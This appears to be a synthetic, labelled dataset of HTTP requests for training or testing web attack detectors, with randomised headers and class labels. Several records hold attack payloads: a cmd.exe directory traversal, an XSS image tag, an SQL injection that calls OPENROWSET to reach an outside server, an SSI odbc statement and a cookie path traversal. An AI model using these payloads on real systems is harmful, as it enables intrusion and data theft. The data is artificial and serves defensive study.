Referer: /Ofsta/6gQebml9/aetEo.js
TE: gzip;q=0.5,deflate;q=0.2
Trailer: If-Range
User-Agent: Mozilla/5.3 (compatible; MSIE 2.8; Windows NT; x7hkeeuoa; ip8iegee; ebuNcmNu)
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: han/1.9 108.243.82.101, ndifoh/6.4 www.wCta.css
Transfer-Encoding: gzip
Upgrade: ochnm/4.8, 7fb2al/4.6, nnde/0.6, Oii67o/1.6, btqoia/9.7
Warning: 378 www.dbe0v.htm:43 "fcfyaasnjAgaFes4ea" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 62118973546819667200
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21096
Start - Id: 44328
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ziihqre.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rqrSEa-7eare;q=0.8
Cache-Control: no-transform
Client-ip: 202.227.254.173
Cookie: pexk=zO-HOG91k;fAEmf5olleo=pterftnf1IIwye;LVSfj70KRNZ=68530883;hIloaaggrunqm=1iWvsy;gmualoe5t=xmletei
Cookie2: $Version="92"
Date: Mon, 05 Apr 10 06:15:47 UTC
ETag: "JwOlqko42x3NtlOT"
Expect: Isdeea8T=dvor7
From: ssaaei@srTei5is.de
If-Modified-Since: Mon, 24 Jan 05 17:24:45 CET
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "Ys3-t@Nfjjqzz8p"
If-None-Match: *
If-Range: "KifzXthQy8DwbK-h6d"
Max-Forwards: 0173
MIME-Version: 1.6
Pragma: htx5P='d'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://4teT.st/3klieh/fhttdl.cgi
TE: deflate;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/3.6 (compatible; MSIE 4.6; WinNT; eyrgoetel)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 127x111
Via: FTP/0.8 102.209.253.118
Transfer-Encoding: compress
Upgrade: tzsa/1.2, i18be/3.4, iXa/9.5
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44328
Start - Id: 9196
class: Valid
GET /gdTNHGXOL.nsf?nzyel4jtwet3e=+r1a&i7trlTq6lpnst=vvOdVV8DlQ&ngieeaaUbtfabxi=wwusq2iurdi7i HTTP/1.1
Host: 97.206.219.99
Connection: rf4yEqv
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 77.58.247.61
Cookie: wctaxUsoi=90778;THjd=1whmsneneaqa;@hbgsound7E3TiN=rSkD@sB
Cookie2: $Version="326"
Date: Mon, 14 Dec 09 12:57:35 UTC
ETag: W/"byQHS@S-Jnb60KL"
Expect: 100-continue
From: enjtcitc@et92Icoot.com
If-Modified-Since: Fri, 16 Feb 07 02:47:54 UTC
If-Unmodified-Since: Fri, 25 Jan 08 03:52:34 UTC
If-Match: *
If-None-Match: "73HhWXeio.c_PjI"
If-Range: Fri, 16 Apr 10 20:52:46 UTC
Max-Forwards: 59
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM bmRlZ3JoZmEzbmlQZ29kSWJOb25ydDFvb1VubjZlOHJk
Authorization: Digest uri=/su1oety/6WeQ8/ipsert/Qpdoi6.cfm
Range: 57164-,9027-962000
Referer: /6vRA0o/lctr.wmn
TE: trailers
Trailer: Warning
User-Agent: Mozilla/9.4 (Windows; U; Windows NT 2.8; dj-wl; rv:8.4.9) Gecko/16951680
UA-CPU: StrongARM
UA-Disp: 5248,9403,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3033x117
Via: 7.6 129.30.142.73, 6.0 www.jhepcttt.htm, 2.5 www.onyos.png
Transfer-Encoding: hrUubt
Upgrade: itrdo/9.1
Warning: 029 www.rgnrlhe.js "hetef0djrse" "Sun, 29 Aug 04 17:38:57 GMT"
X-Forwarded-For: 252.67.93.211
X-Serial-Number: 6194472934474
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 9196
Start - Id: 15778
class: Valid
GET /tleiboser8riyc/omumRsarxvt1Kmpr6cns/a8gdu1SaOZxzU/aOiea4/o4n1Lrid7p8fiI5_1F.shtml? HTTP/1.0
Host: 24.6.243.172
Connection: kUnt
Accept: application/zip;q=0.6
Accept-Charset: x-mac-hebrew;q=0.7, x-mac-ce;q=0.2, iso-8859-6, x-mac-greek;q=0.6, x-mac-ce;q=0.2
Accept-Encoding: 
Accept-Language: t-6r4o
Cache-Control: no-store
Client-ip: 254.222.89.179
Cookie: io=arqg1a91J_De;teessu4t=(=yse;ye8=9y14o0b
Cookie2: $Version="20"
Date: Wed, 09 Jun 04 20:17:17 UTC
ETag: "8XuEGFmpUXxFo6Zy4f"
Expect: 100-continue
From: ue8iwlO@tint459.com
If-Modified-Since: Sun, 13 Jan 08 16:11:18 GMT
If-Unmodified-Since: Tue, 31 Oct 06 16:19:36 GMT
If-Match: *
If-None-Match: "HiCbfsm_heqdph219Gqc"
If-Range: Fri, 16 May 08 17:59:18 GMT
Max-Forwards: 109
MIME-Version: 4.2
Pragma: ioal='yMiveoe'
Proxy-Authorization: Digest qop=auth
Authorization: Basic U2lvZm06bmNmbnE=
Range: 56833-
Referer: /torg/ndcaEh/iuiaoi/hey57oe/eee4nT.asmx
TE: chunked,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: ogoamos57ssuodrH
UA-CPU: StrongARM
UA-Disp: 996,4462,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9100x614
Via: FTP/8.9 15.63.90.102, HTTP/2.1 www.llnrrr.htm
Transfer-Encoding: yoro
Upgrade: tlub/4.7, hksiTB/4.2, jtoi5n/2.3
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15778
Start - Id: 48049
class: XSS
GET /-tmpwRF4n/p73fxMmaqGG869G1/no-9uFBi_cQe0NIGy5x8/4ed/asVcsQr8V/Yd1EEt@UaMe95W/1ahl8lxwspwsl9/luTuereffsuO50r/5d.html?tn0ei6n=hupdate&ai=ocnut1cu&oTRor=5352&nyodbsisusdlz=%3Cimg++src++%3D+%22++livescript%3A%5Balert++%28%27nfwgekue%27%29%3B%5D++%22++++%3E HTTP/1.0
Host: 21.189.175.212:552
Connection: close
Accept: image/*, image/*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: compress, gzip, deflate
Accept-Language: cMbeH-tf;q=0.1
Cache-Control: only-if-cached
Client-ip: 252.198.126.142
Cookie: sleiecTm3d=2015722541;raiia=teiteoa;tgtutls=mpBNpohavctsos
Cookie2: $Version="1"
Date: Fri, 22 May 09 24:08:30 UTC
ETag: "L_-wg1nSAVO_G5W.OjZ4"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: elwwua@EmhIEncw.it
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Fri, 29 Aug 08 05:57:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6922
MIME-Version: 6.0
Pragma: ee='daeswhu'
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: NTLM dG9zdGhhdHZoSDd1dHlhdVJtRWhhb2I4aU9wbjljenRpdnRlZUllRmF0bHRpaXRh
Range: 16-601
Referer: http://kmIster.net/rreoyt/f4xwri/4iuoOvn/uqnieh/desosnjt.js
TE: trailers
Trailer: Accept-Charset
User-Agent: z3QpNElnY http://www.rhet.gov
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9126x119
Via: 9.0 www.t33pa.tiff, oh3i6e/3.3 68.53.176.230
Transfer-Encoding: identity
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48049
Start - Id: 24347
class: Valid
GET /oAnzantnfedra/WL/sGsVQjt/joeXi/9repeftaf7totoAohI/AaNNtlm/h0n7/mndr/23WD1pGbuikv4rk.msf?ncnrotypasoge=ymoosg%24N6eiao%3D&O5oVyaMyO3keman=qtcdwome&tGohyfyideno7=Ri%2F3ayta5&Fa23AL=6569978&6spTYLz=8&krgctsirfknc=nodeFew&niiwrmhcz=962&nt=%3Fxsxp_logrxp_nph-oa%24tOy HTTP/1.1
Host: 6.161.108.170
Connection: keep-alive
Accept: text/*, text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.2, gzip, deflate, compress
Accept-Language: r-x, ks-wat0tahi;q=0.8, Cfiob-Yett;q=0.4
Cache-Control: min-fresh=134
Client-ip: 114.108.65.238
Cookie: sy0aVeeN7Kbin=(2]
Cookie2: $Version="7"
Date: Sat, 16 Jun 07 02:35:17 GMT
ETag: W/"uI7PZAM@ronIxsGK"
Expect: 100-continue
From: 5hRu@STpwssetis.be
If-Modified-Since: Mon, 11 May 09 03:59:07 CET
If-Unmodified-Since: Sun, 06 May 07 20:18:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 120
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM ZXNJZ3JOdGNhaG53Y29jSThkdGR0ZTBsbHJpdGV1MHJ1ZXNzbmhyZ2ZudFJpcGU=
Range: 3174-4551,6064-
Referer: /Siegs/n8iiuOtc.gif
TE: deflate,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/0.0 (X11; U; Linux i386 6.4; ag-8p; rv:8.2.4) Gecko/00840500
UA-CPU: Sparc
UA-Disp: 544,888,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 352x5203
Via: rrAj/0.2 www.m6ed.htm
Transfer-Encoding: llrne
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24347
Start - Id: 41598
class: SqlInjection
GET /CB2/mE/gtsosnputomsRje/ulthZHqaH.pl?fteTcwejpistmbI=TperlddropianodenusAt&mo9gl9F7r6ea=rla&acdis=48&umtsk=490172&ahs3gsus=550&orWlgEdtio=winnth&teiosxsmoe=3234&Thltteetr4b=guarxbhtaccesndrme6ph&m7inNtne=%3B+insert+++++into++++OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3DrtsEw%3Bpwd%3DOgsst%3BNetwork%3DDBMSSOCN%3BAddress%3D108.7.40.111%2C1433%3B%27%2C%27select+++*++++from+_sysdatabases%27++%29%3B+select++*++++from+LinkedOrRemoteSrv1.master.dbo.sysdatabases&tulStoAotigEna=6aerm%3F HTTP/1.1
Host: 45.18.198.158
Connection: close
Accept: audio/x-wav, video/*;q=0.7
Accept-Charset: x-mac-turkish, windows-1251;q=0.0, iso-8859-5, x-mac-cyrillic;q=0.3, windows-1257;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: lb1aieei='s'
Client-ip: 70.60.65.162
Cookie: oXje=oprocessing-instructiont perl6cc;risivt=xtermodm;it6mihofhm5oeo=+;sw2dxchmto0k=C3chOne;esaty=5tt+8lors
Cookie2: $Version="7"
Date: Tue, 20 Jan 04 07:07:47 UTC
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: mainn@tiee.st
If-Modified-Since: Thu, 27 May 04 17:37:51 CET
If-Unmodified-Since: Tue, 25 Nov 08 07:27:59 GMT
If-Match: *
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Wed, 26 Aug 09 09:40:06 GMT
Max-Forwards: 6
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXR6dGN1ZW9JbThjdG9iYXNkZW5udGE1bmVpZDllb3ZvU3ZoaGVt
Authorization: Basic TkFpZWw6aWxzQnBy
Range: 7594-
Referer: http://zeaaIoas.de/tfa9ei/niy2vAa/il3jeat/rnoiseGG.gif
TE: deflate;q=0.2,chunked,trailers
Trailer: Referer
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 1.4; dt-6e; rv:2.5.3) Gecko/45279448
UA-CPU: StrongARM
UA-Disp: 8644,7671,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1o7cnc/8.8 30.253.95.105
Transfer-Encoding: identity
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41598
Start - Id: 25906
class: Valid
GET /llnoielr9iiR0eti/eO/nsDenaerbge/e1nnLs/kESy6rkqe1G3TMx9SrJ/h9hyeeo/jUCogx9p8dlYToJ..js? HTTP/1.1
Host: 238.213.154.242:80
Connection: hqtrnwt
Accept: image/png;q=0.3, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: weo-lann359R;q=0.3, c-aeut, Ai2drih-ilt, tof-bu;q=0.7, ssmotx-nrut;q=0.2
Cache-Control: max-age=35377
Client-ip: 107.100.56.91
Cookie: TcmdCKTEnYUWgroup byb=78
Cookie2: $Version="3"
Date: Thu, 17 Jun 04 21:10:55 UTC
ETag: W/"q3Fpekrqkx1lVku"
Expect: xiTecej=s1gaek;sexe2ms
From: ceaPTpe@asscae.com
If-Modified-Since: Wed, 19 Apr 06 04:08:10 CET
If-Unmodified-Since: Thu, 22 Mar 07 12:04:37 UTC
If-Match: "q2Dx-CA2QHYFajKy"
If-None-Match: *
If-Range: Fri, 10 Aug 07 06:14:27 UTC
Max-Forwards: 859
MIME-Version: 7.9
Pragma: th2sa=nahaMnnS
Proxy-Authorization: Digest opaque="fwhyni8g"
Authorization: Basic ZTIzdDpvZWFpdA==
Range: -1130,110984-785,-31
Referer: http://www.isnhhhme.gov/shxEnie/twotsnr/i9rso9ao/rUyM/Olurnt.gz
TE: gzip,trailers,chunked;q=0.2
Trailer: Host
User-Agent: Mozilla/3.7 (compatible; egas; Open BSD i386; hOepei; deTmlusdt)
UA-CPU: x86
UA-Disp: 859,629,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: 7.0 www.idnrtb.png:92445, hmrew/4.5 www.ihbndlwr.gif, flre/5.1 12.147.254.205:689
Transfer-Encoding: deflate
Upgrade: ubOor/8.3, ofwchs/5.9, Euhsr/1.6, eto/9.5, S5x/4.0
Warning: 862 254.139.199.159 "hnptOgFo1IjtwesaTav" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25906
Start - Id: 40845
class: SSI
GET /QvwhX5y0R/Tu/HEDir2mvarVtk2Co_/iixe5trepU6auA3yn/tTQO1/ampMt4nm1aidnmaeeth/qiIiepj/thlda5eh/elgsHqek.jpeg?anqo=%3C%21--%23odbc+statement+++%3D++%22select++vo%2C+5e%2C+++++o0wdias+++++from++++lrrasMr2co+++order++++by+++2%2C+++++470%2C+++++8%22+++--%3E&dqehqdyrO2t=%3F%24fiiabeinserteieiororwinnt+n&dobexntaidcamsr=ry5&7rntsiot=546015&HN04sAps-=evl&cn=enetcat0%26oetallv8u8em&sose=1985623456 HTTP/1.0
Host: www.ortdN4.uk
Connection: lftel
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: c1wk-smtErbe, bk-IitfpI;q=0.9, co00rtU-iti34rEa;q=0.0, ec7dhMr-twsyb;q=0.2, s-a
Cache-Control: yR7es=tti2lc
Client-ip: 183.188.60.40
Cookie: FPny0--Mv9zE=hgi
Cookie2: $Version="28"
Date: Mon, 29 Sep 08 10:48:31 UTC
ETag: "c4DJWXpb1.Q0Ita"
Expect: un3h
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Tue, 08 Feb 05 05:48:23 UTC
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Jan 09 07:12:53 CET
Max-Forwards: 905
MIME-Version: 1.5
Pragma: stseT='3V'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: /neEh.mpg
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (compatible; deeRo; Unix; baoer; spbeIs; hi2ipOaCte)
UA-CPU: PowerPC
UA-Disp: 7505,615,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: hec8e/5.8 www.yrnnt.jpeg
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 895 www.misa5.html "rhe6s4bantnhdot" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 938964588863184564
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40845
Start - Id: 32801
class: Valid
POST /IZweEhavingJ/i@KUrB43f9mCtMtf_9rt/ium1rg0O6rdhiNeohI/iBx_KO.gif? HTTP/1.0
Content-Length: 184
Content-Language: 0we
Content-Encoding: identity
Content-Location: /w5bj4jou/dt1uvsn/ssecpC/t7btb.jpg
Content-MD5: d3VkYWl5eHRvcUFpcnhzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Feb 07 16:03:14 GMT
Last-Modified: Wed, 14 Sep 05 05:30:02 CET
Host: www.yneeo.com
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i;q=0.2, iso-8859-3, windows-874;q=0.3, shift_jis
Accept-Encoding: *
Accept-Language: m6mnn-e, lT-4un;q=0.9, 1Jieat-rtinctit, ot-itoestor;q=0.6, dhyAe-5o9;q=0.6
Cache-Control: max-age=8
Client-ip: 87.1.179.160
Cookie: htrooNeRrh99=68977
Cookie2: $Version="7"
Date: Sun, 14 Feb 10 05:05:04 GMT
ETag: "JG81v2IzlYi.pwu"
Expect: rsAyl
From: vie2r@nrt2Rvu8ma.org
If-Modified-Since: Fri, 02 Jan 09 05:34:06 GMT
If-Unmodified-Since: Fri, 07 Aug 09 21:51:46 UTC
If-Match: "ytIv_7VFSPvXvBO"
If-None-Match: "wtqqg8K-2cGq.Yb6Uck."
If-Range: Sat, 06 Feb 10 02:36:33 UTC
Max-Forwards: 5
MIME-Version: 8.6
Pragma: rltee=ia
Proxy-Authorization: NTLM ZUxsc2pyc05oaDZlNnRzZWxuZWVzZUVpNG4wZXRldzVoaWVobnpwcmFlQ08=
Authorization: NTLM ZG9lYVVvaW1uYWttMmk5Ymh5bGVoYWxvZGVoYWJrbGl1VHRkbjFpanJsZXVy
Range: 20567-6258,-56087
Referer: http://www.EraoDhb.st/ftta/ioust/uwoQ4e9P.txt
TE: trailers,deflate
Trailer: Host
User-Agent: uoestZnyse/9.8.9
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 373x2208
Via: 4.4 www.bluer.shtml:49243, 0.3 254.125.216.27, 2.6 www.ii43ea.jpeg:9414
Transfer-Encoding: gzip
Upgrade: nceno/6.6, dCa/0.3
Warning: 045 www.elolydv.png "pbietttuaolq" "Sat, 01 Sep 07 19:08:20 UTC"
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 6352677
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

nlieetnpnsre=ciddq)&s3f=fbinti&Im8Xt=wFOhhICCSoP&wPgjI8ura=745880&xiefu5Osmbhne=ttrtdr06orLbs&tirtGnnar8o=eshs3bnIstqls&ifa=ss7I i>wea&Usetcchild5Va1K_Y=o$&ex54=sTt~&dc=9354237

End - Id: 32801
Start - Id: 33188
class: Valid
PUT /Z-unionvkNijlike4voNNk/fdcqdWWposition/sGLUg.html? HTTP/1.1
Content-Length: 102
Content-Language: roacty
Content-Encoding: identity
Content-Location: /hherfD/h4a1Eido/siascso.php4
Content-MD5: RThGdGVuYW85YWJvbnRhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jan 04 09:47:24 CET
Last-Modified: Sun, 07 Feb 10 19:44:36 CET
Host: www.souY.it
Connection: tnbO0c1
Accept: */*
Accept-Charset: iso-8859-15;q=0.3, x-mac-greek;q=0.3, windows-874, x-mac-hebrew;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: n-su2p;q=0.2, exa-me;q=0.7
Cache-Control: max-age=144
Client-ip: 18.214.52.39
Cookie: lnxytesg=623793;j2f=nwou;iNEiceoAh=bEDE2E;neeavw=3849558
Cookie2: $Version="453"
Date: Wed, 17 Mar 04 01:37:50 GMT
ETag: "VA6Cmm7Y3oyhrr3oP."
Expect: fttc=bojaii
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Thu, 29 Apr 10 01:24:42 GMT
If-Unmodified-Since: Tue, 02 Jan 07 24:25:14 UTC
If-Match: *
If-None-Match: "4FQ.AeBzXHrO8szdOssO"
If-Range: Sat, 26 Jan 08 07:57:13 GMT
Max-Forwards: 7841
MIME-Version: 7.7
Pragma: nnnmeao='irree'
Proxy-Authorization: Basic Z0Vkbm9laTpycXhtdA==
Authorization: a02oWr Sqhe=ioxt
Range: 8-21126,9-397638
Referer: /bn1N/OthWg/aar2sio.cgi
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 4.0; ts-7r; rv:1.5.6) Gecko/57331364
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7712x8519
Via: 7.2 25.246.171.175, iJls/8.8 188.239.148.250, HTTP/2.1 51.66.226.188
Transfer-Encoding: gzip
Upgrade: blYO/9.0, dN8w/2.7, Ooa0/5.1, NcTat/8.3, alwi/9.7
Warning: 605 165.118.208.207:59007 "stw4t" 
X-Forwarded-For: 68.186.72.84
X-Serial-Number: 0421946796861302632
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

erKoaeted=hG.V&O_LRGHmochamYGeN=Logkzz58o&hit=e ~cer ucA2t trh&ZT5_e4l=sQm&owfeoeoRtice=002&4uup=867

End - Id: 33188
Start - Id: 31720
class: Valid
GET /o84I29FQjjZXZF71/9w@f57v40Q/usBUr1Y7/u_cfmU/ttrr2aiselmtet/nJmIkQP6q.shtml?rhrSoUhny=oum&srm=9&lOL2stdinEuniondch=8517398&K7HnC2=aa%7C%3Elir357%3A&48bedsvptaso=9nahtpasshtKnc0e%7Eeeeeisa HTTP/1.0
Host: www.ynofh0daat.com
Connection: keep-alive
Accept: video/quicktime;q=0.5, application/x-tar
Accept-Charset: cp-936, iso-8859-2;q=0.6
Accept-Encoding: deflate, deflate, gzip;q=0.0, compress, deflate;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 194.242.237.128
Cookie: ikHCzJ_PRM1=753
Cookie2: $Version="1"
Date: Thu, 18 Dec 08 14:03:08 CET
ETag: W/"q_z9iMO0LlT_6-3b"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Mon, 26 Jul 04 17:09:54 GMT
If-Unmodified-Since: Mon, 03 Dec 07 01:09:59 GMT
If-Match: *
If-None-Match: "jUJcTIP3HMHHVVkgqvY"
If-Range: Wed, 26 Sep 07 19:12:21 CET
Max-Forwards: 41
MIME-Version: 2.9
Pragma: nnnta='5getnh'
Proxy-Authorization: tdsc jhdhva=erfp
Authorization: NTLM YnJ0dDVhcHR0bm9lYWEyaWFibmlhOWhuaGxucFJqT2lwZ2RuZTluYWdEaWJu
Range: -062,-681156,198-
Referer: /nd5me.zip
TE: deflate;q=0.8,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 0.6; tt-lE; rv:1.0.3) Gecko/28895732
UA-CPU: Sparc
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 751x460
Via: 9.3 238.224.55.48
Transfer-Encoding: identity
Upgrade: toatet/2.7, hmqh/9.3
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 84.104.88.36
X-Serial-Number: 48619214669
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31720
Start - Id: 8241
class: Valid
GET /cR3JgeblhUNv5ZYg2tk/dhranlv9anTNbepgtah/E0ea7oeqs/6aioHlqmsihhiOh/set1keAe3Eds/4processing-instruction/igO4k3mnocotphyo/aypiys/idesoaayxtwd.png? HTTP/1.0
Host: www.tgtadunx.gov:3920
Connection: close
Accept: audio/x-wav, text/html;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=71979
Client-ip: 163.254.45.151
Cookie: sTne= f6nF;hpdeletea=nph-5trO@sslsdlgroup by\zlink;wqL8r=si0a;ijuwesUqh5gt=88WF_g;roer9mnesel=9170306
Cookie2: $Version="79"
Date: Sun, 04 Nov 07 07:20:29 UTC
ETag: W/"hea.MfjvUK@lxe0biG"
Expect: 100-continue
From: seep8@iavee.it
If-Modified-Since: Thu, 17 Mar 05 07:46:53 UTC
If-Unmodified-Since: Tue, 12 Jun 07 15:27:21 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Oct 09 11:26:26 UTC
Max-Forwards: 5200
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic ZWQ2M3Q6ZWlsYw==
Authorization: re6i beTyuwz=d8ce4ooe
Range: 62861-,40-66
Referer: http://www.a6hIEfd.net/eirscl7h/vawelv/bteslki6.pl
TE: trailers,gzip,chunked
Trailer: Pragma
User-Agent: cpqg7nFed1 (iP-TCq; rsUuRkHI; qTfdDHu)
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5572x247
Via: HTTP/7.2 127.36.172.7, aHdsus/6.9 www.ey3r.shtml, 0.8 www.ueefhtnc.css
Transfer-Encoding: imWIds; eIiwtme=tdtxwrh
Upgrade: rht7s7/2.6, dxceec/0.8, Fr2jv/6.2
Warning: 350 www.rvsnz.jpg "iihmtwbmshrEsre" "Tue, 20 May 08 02:04:29 UTC"
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 8241
Start - Id: 44664
class: PathTransversal
GET /iH/ekU_@3fbaXGoay/oel5ytlmynkagsiraqKs/i9UIsOu.css? HTTP/1.0
Host: 43.138.127.44
Connection: d1tiiH
Accept: text/html;q=0.3
Accept-Charset: windows-1252, utf-7, hz-gb-2312;q=0.7, iso-2022-jp
Accept-Encoding: identity;q=0.7
Accept-Language: 5tnnos-ni, tsT8No-sr, Erts7e-o;q=0.7, gntnc-h9uDut2a;q=0.2, eISl3-a4P6
Cache-Control: only-if-cached
Client-ip: 48.43.170.158
Cookie: R9inimeho=ord;tsy9iernggd1=aemeshtiloiu;4idttio=18795030;cehXerdkrnel=txgnyptrcpnmamc3\]s];f11sdnE=../../../usr/dsqqdsqsd.xml;x3anltRrc=2983346
Cookie2: $Version="591"
Date: Thu, 07 Jul 05 03:26:50 GMT
ETag: W/"YsuLFIP1mMlqMdBw"
Expect: dgct7Ia
From: eeuabRn@lal2mty.ch
If-Modified-Since: Fri, 20 Mar 09 18:26:54 UTC
If-Unmodified-Since: Thu, 04 Dec 08 08:50:41 UTC
If-Match: "-Cl5ywwJYRuUK5Zjc"
If-None-Match: "@prGUAhlsOWyIztK"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic aXh5b246dzh0Y2Y=
Authorization: Basic R2V0czp1ZW11bkE=
Range: 316-826
Referer: http://mgnan.org/8brtf/jrtl/ee04ch.pl
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: lsorlvics
UA-CPU: PowerPC
UA-Disp: 0905,2233,16
UA-OS: Windows 95
UA-Pixels: 827x397
Via: HTTP/7.8 145.208.135.91
Transfer-Encoding: compress
Upgrade: ewjer/3.6, iieee/3.2, dbnoN/0.4, afTm/9.7
Warning: 228 172.128.177.184 "teeeuO" 
X-Serial-Number: 17192
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44664
Start - Id: 1389
class: Valid
